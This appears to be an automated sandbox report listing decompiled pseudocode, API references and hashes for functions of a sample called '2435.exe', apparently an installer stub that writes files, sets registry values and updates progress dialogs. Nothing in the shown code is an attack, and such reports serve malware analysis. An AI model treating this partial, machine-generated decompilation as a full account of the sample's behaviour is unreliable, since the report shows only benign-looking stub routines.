										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E733512FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x7335405c;
									__esi = __esi +  *0x73354064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E73351429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E73351224(0x73354034);
					goto L10;
				}
			}

0x73352306
0x7335230a
0x73352315
0x73352315
0x7335231c
0x73352321
0x00000000
0x00000000
0x73352325
0x73352328
0x00000000
0x00000000
0x7335232d
0x73352338
0x73352348
0x7335233f
0x73352341
0x73352357
0x73352357
0x00000000
0x7335232f
0x7335232f
0x73352358
0x7335235c
0x7335235e
0x7335235e
0x73352361
0x73352361
0x73352369
0x7335236c
0x73352373
0x73352377
0x73352446
0x73352447
0x73352452
0x7335247d
0x7335247d
0x73352462
0x7335246e
0x73352464
0x73352464
0x73352464
0x00000000
0x7335237d
0x7335237d
0x00000000
0x73352384
0x00000000
0x00000000
0x7335238d
0x00000000
0x00000000
0x7335239b
0x7335239e
0x00000000
0x00000000
0x733523a7
0x733523ac
0x733523af
0x733523b0
0x00000000
0x00000000
0x733523bd
0x733523c8
0x733523d7
0x733523e2
0x73352405
0x73352408
0x733523e4
0x733523e8
0x733523ee
0x733523ef
0x733523f2
0x733523f3
0x733523f6
0x733523fd
0x733523fd
0x00000000
0x00000000
0x73352410
0x73352413
0x7335241f
0x73352421
0x00000000
0x00000000
0x73352424
0x73352427
0x73352428
0x7335242f
0x73352436
0x73352439
0x7335243b
0x7335243e
0x00000000
0x00000000
0x7335237d
0x73352377
0x7335234d
0x73352352
0x00000000
0x73352352

APIs

GlobalFree.KERNEL32 ref: 73352447

Part of subcall function 73351224: lstrcpynA.KERNEL32(00000000,?,733512CF,-7335404B,733511AB,-000000A0), ref: 73351234

GlobalAlloc.KERNEL32(00000040,?), ref: 733523C2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 733523D7
GlobalAlloc.KERNEL32(00000040,00000010), ref: 733523E8
CLSIDFromString.OLE32(00000000,00000000), ref: 733523F6
GlobalFree.KERNEL32 ref: 733523FD

Strings

@u<u, xrefs: 733523F6

Memory Dump Source

Source File: 00000000.00000002.237544307.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000000.00000002.237538806.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237551256.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237556712.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID: @u<u
API String ID: 3730416702-3153514966
Opcode ID: c5d577dbacf8ba8c8ef111689dfc42626c7b35e9dcab9b1930bb0fc6e0f24a63
Instruction ID: 65491e489d803d5a4dc64620a0cfe7f4a0f9c995a0f6aff1c806130d5fd8c1b9
Opcode Fuzzy Hash: c5d577dbacf8ba8c8ef111689dfc42626c7b35e9dcab9b1930bb0fc6e0f24a63
Instruction Fuzzy Hash: 824159B2908309DFE7319F758844F6AB7ECFB40322F24491EF59AC6190D73495858BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC8, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DC8(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056C6(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405684("*?|<>/\":", _t5))) == 0) {
							E004057FE(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405dca
0x00405dd2
0x00405de6
0x00405de6
0x00405dec
0x00405df9
0x00405df9
0x00405dfa
0x00405dfc
0x00405e00
0x00405e02
0x00405e0b
0x00405e0d
0x00405e27
0x00405e2f
0x00405e2f
0x00405e34
0x00405e36
0x00405e38
0x00405e3c
0x00405e3d
0x00405e40
0x00405e48
0x00405e4a
0x00405e4e
0x00000000
0x00000000
0x00405e54
0x00405e59
0x00000000
0x00000000
0x00000000
0x00405e59
0x00405e5e

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\2435.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\2435.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
CharPrevA.USER32(?,?,"C:\Users\user\Desktop\2435.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42

Strings

*?|<>/":, xrefs: 00405E10
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DC9, 00405E04
"C:\Users\user\Desktop\2435.exe" , xrefs: 00405DCE

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\2435.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-71729309
Opcode ID: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
Instruction ID: 3b6179abbfe29fc78842bf11aa846075366cc437f950451d76d565b88bc2b460
Opcode Fuzzy Hash: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
Instruction Fuzzy Hash: A0110861805B9129EB3227284C48BBB7F89CF66754F18447FD8C4722C2C67C5D429FAD

Uniqueness

Uniqueness Score: -1.00%

Function 00403F7F, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F7F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403f91
0x00404025
0x00000000
0x00404025
0x00403fa2
0x00403fa6
0x00000000
0x00000000
0x00403fac
0x00403fb5
0x00403fb8
0x00403fb8
0x00403fbe
0x00403fc4
0x00403fc4
0x00403fd0
0x00403fd6
0x00403fdd
0x00403fe0
0x00403fe3
0x00403fe5
0x00403fe5
0x00403fed
0x00403ff3
0x00403ff3
0x00403ffd
0x00404002
0x00404005
0x0040400a
0x0040400d
0x0040400d
0x0040401d
0x0040401d
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403F9C
GetSysColor.USER32(00000000), ref: 00403FB8
SetTextColor.GDI32(?,00000000), ref: 00403FC4
SetBkMode.GDI32(?,?), ref: 00403FD0
GetSysColor.USER32(?), ref: 00403FE3
SetBkColor.GDI32(?,?), ref: 00403FF3
DeleteObject.GDI32(?), ref: 0040400D
CreateBrushIndirect.GDI32(?), ref: 00404017

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: 4cc26f8bf5fc777f430f8318c3ba194748f169832e683f7fcd21add738ba3f9d
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: C221C371904705ABCB209F78DD08B4BBBF8AF40711F048A29F992F26E0C738E904CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056C6(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E0040581E(_t52);
				_t27 = E0040583D(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031F1(_t47);
						E004031BF(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F18(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004057FE( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F18(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x0040267c
0x0040267e
0x0040268a
0x0040268d
0x00402697
0x0040269b
0x0040269b
0x004026a1
0x004026ae
0x004026b6
0x004026b9
0x004026bf
0x004026cd
0x004026d2
0x004026d6
0x004026d9
0x004026e2
0x004026ee
0x004026f2
0x004026f5
0x004026ff
0x0040271e
0x00402706
0x0040270b
0x00402713
0x00402716
0x0040271b
0x0040271b
0x00402725
0x00402725
0x00402737
0x0040273e
0x00402750
0x00402750
0x00402756
0x00402756
0x00402761
0x00402762
0x00402766
0x0040276a
0x00402770
0x00402770
0x00402777
0x00402164
0x0040288e
0x0040289a

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
GlobalFree.KERNEL32 ref: 00402725
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
GlobalFree.KERNEL32 ref: 0040273E
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
Instruction ID: 719c612f4f238206e278f6e296a81204df483451b361404a9b6a09c3536a307a
Opcode Fuzzy Hash: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
Instruction Fuzzy Hash: F831AD71C00128BBDF216FA4CD89DAE7E79EF08364F10423AF920772E0C6795D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404F04, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F04(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405B88(0, _t39, 0x41fc78, 0x41fc78, _a4);
					}
					_t26 = lstrlenA(0x41fc78);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc78);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc78;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc78)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc78, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404f0a
0x00404f16
0x00404f19
0x00404f1f
0x00404f2b
0x00404f2e
0x00404f31
0x00404f37
0x00404f37
0x00404f3d
0x00404f45
0x00404f48
0x00404f65
0x00404f69
0x00404f72
0x00404f72
0x00404f7c
0x00404f85
0x00404f91
0x00404f98
0x00404f9c
0x00404f9f
0x00404fb2
0x00404fc0
0x00404fc0
0x00404fc4
0x00404fc6
0x00404fc9
0x00000000
0x00404fc9
0x00404f4a
0x00404f52
0x00404f5a
0x00404f60
0x00000000
0x00404f60
0x00404f5a
0x00404f48
0x00404fd3

APIs

lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
SendMessageA.USER32 ref: 00404F98
SendMessageA.USER32 ref: 00404FB2
SendMessageA.USER32 ref: 00404FC0

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
Instruction ID: 33d69ec58002f5e3cec48cf4aa7ac502a1da6879986bf9ca4026f821734cd723
Opcode Fuzzy Hash: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
Instruction Fuzzy Hash: C4219D71A00108BBDF119FA5CD849DEBFB9EB49354F14807AFA04B6290C3389E45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402BD3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BD3(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41704c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41704c = 0;
					return _t15;
				}
				__eflags =  *0x41704c; // 0x0
				if(__eflags != 0) {
					return E00405EC1(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B3B, 0);
						 *0x41704c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BB7());
						return E00404F04(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402bdf
0x00402be1
0x00402be8
0x00402beb
0x00402beb
0x00402bf1
0x00000000
0x00402bf1
0x00402bf9
0x00402bff
0x00000000
0x00402c02
0x00402c09
0x00402c0f
0x00402c15
0x00402c17
0x00402c1d
0x00402c5b
0x00402c64
0x00000000
0x00402c69
0x00402c1f
0x00402c26
0x00402c37
0x00000000
0x00402c45
0x00402c26
0x00402c71

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BEB
GetTickCount.KERNEL32 ref: 00402C09
wsprintfA.USER32 ref: 00402C37

Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404F98
Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404FB2
Part of subcall function 00404F04: SendMessageA.USER32 ref: 00404FC0

CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C5B
ShowWindow.USER32(00000000,00000005), ref: 00402C69

Part of subcall function 00402BB7: MulDiv.KERNEL32(00008000,00000064,?), ref: 00402BCC

Strings

... %d%%, xrefs: 00402C31

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
Instruction ID: c44cf6bb529b7c61e0c77009ed50883557557090b8ffabf6f859222ef57aaf40
Opcode Fuzzy Hash: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
Instruction Fuzzy Hash: C6016170949210EBD7215F61EE4DA9F7B78AB04701B14403BF502B11E5C6BC9A01CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 004047D3, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004047D3(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x004047e1
0x004047ee
0x004047f4
0x00404832
0x00404832
0x00404841
0x00404848
0x00000000
0x0040484a
0x004047f6
0x00404805
0x0040480d
0x00404810
0x00404822
0x00404828
0x0040482f
0x00000000
0x0040482f
0x00000000

APIs

SendMessageA.USER32 ref: 004047EE
GetMessagePos.USER32 ref: 004047F6
ScreenToClient.USER32 ref: 00404810
SendMessageA.USER32 ref: 00404822
SendMessageA.USER32 ref: 00404848

Strings

f, xrefs: 00404824

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: 01d6173a61c3c3b4b037133c9a52f1e04ee3049876a8ff08b59bebc5d15cf036
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: BA018075D40218BADB00DB94CC41BFEBBBCAB55711F10412ABB00B61C0C3B46501CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402B3B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BB7();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b48
0x00402b56
0x00402b5c
0x00402b5c
0x00402b6a
0x00402b6c
0x00402b78
0x00402b7d
0x00402b7f
0x00402b7f
0x00402b8a
0x00402b9a
0x00402bac
0x00402bac
0x00402bb4

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
wsprintfA.USER32 ref: 00402B8A
SetWindowTextA.USER32(?,?), ref: 00402B9A
SetDlgItemTextA.USER32 ref: 00402BAC

Strings

verifying installer: %d%%, xrefs: 00402B7F
unpacking data: %d%%, xrefs: 00402B78, 00402B88

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
Instruction ID: 39266fd7d8b3d51d4259f470751267aa52f8e49dbca779dff7f29341b6a717b4
Opcode Fuzzy Hash: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
Instruction Fuzzy Hash: AFF03671900109ABEF255F51DD0ABEE3779FB00305F008036FA05B51D1D7F9AA559F99

Uniqueness

Uniqueness Score: -1.00%

Function 00402303, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a370) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a370 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F18(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a370, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a370, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}

0x00402304
0x00402309
0x00402313
0x0040231d
0x00402320
0x00402330
0x0040233a
0x00402341
0x00402349
0x00402357
0x0040235b
0x00402366
0x00402366
0x0040236a
